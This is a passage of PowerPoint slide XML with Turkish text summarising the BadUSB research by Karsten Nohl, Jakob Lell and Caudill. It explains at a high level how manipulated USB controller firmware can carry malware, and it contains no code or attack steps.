              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Karsten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Nohl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Jakob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Lell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB'nin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>neden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olduğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hakkında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> - On Accessories that Turn Evil’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>konulu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sunum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yaptılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>duyuruda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Nohl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tabanlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>denetleyici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ürün</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılımı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>alanının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>manipülasyonu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yoluyla</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yazılımların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tanıtılabileceğini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>belirtti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Kötü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>amaçlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılım</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>içeren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazlarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kontrolü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gibi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>amaçlarla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanılabileceğine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dair</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>araştırma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sonuçlarına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mevcut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>virüs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>koruması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırılara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yanıt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vermenin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>zor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olduğunu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vurguladı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ancak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Nohl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yayınlandığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tarihteki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>araştırma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sonuçlarına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mevcut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üzerindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etkisine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yanıt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vermemiştir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Negatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dalgalanma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etkisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>büyük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olduğundan</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yazılımı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>enjekte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullandıkları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>özel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açıklanmamıştır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB'nin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>neden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olduğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açığının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Nohl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Caudill </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tarafından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kanıtlanmış</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olması</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>herkesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yapabileceği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gerçeği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>nedeniyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>teknolojisine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sahip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>üreticileri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
